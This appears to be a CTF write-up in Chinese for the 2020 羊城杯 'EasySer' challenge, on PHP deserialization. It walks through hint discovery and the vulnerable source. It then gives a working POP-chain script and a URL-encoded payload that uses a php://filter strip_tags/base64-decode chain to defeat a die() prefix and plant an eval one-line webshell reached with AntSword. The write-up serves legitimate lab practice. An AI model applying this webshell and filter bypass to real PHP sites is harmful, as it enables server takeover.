羊城杯2020-EasySer

1

一进去就是这个,直接信息搜集,robots.txt,www.zip,www.zip.gz

robots.txt:

1
star1.php

进入发现是

2

CTRL U发现有提示说

1
用个不安全的协议从我家才能进ser.php

http://127.0.0.1/ser.php发现有源码(可以先star1.php的):

ser.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function hasaki(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}

?>

里面有个

1
<?php die("nononon");?>
1
2
3
他会把die 进入文件内容中,使的我们后面写入的恶意代码无法执行。

我们可以通过利用php伪协议流,写入base64编码,进行string.strip_tags过滤掉 再对文件内容进行解密,就得到了我们写入的 恶意代码,之前的被杂糅掉了,不影响我们后续的代码。

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
 
class GWHT{
    public $hero;
}
class Yongen{ 
    public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
    public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==";
    //<?php @eval($_POST[1]);?>
}
$a = new GWHT();
$a ->hero = new Yongen();
echo urlencode(serialize($a));

直接修改值失败了不知道为什么,可能就是这个的原因吧

上传点不知道在哪,用哪个arjun扫上传参数,但是没扫出来,不知道为什么,出来的参数值为c

1
http://4f22b021-d9bb-4797-8bf1-60de688b4cd7.node5.buuoj.cn:81/star1.php?path=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs%2FPg%3D%3D%22%3B%7D%7D

直接蚁剑链接就行,密码为1

参考链接:https://www.cnblogs.com/magic123/articles/17511984.html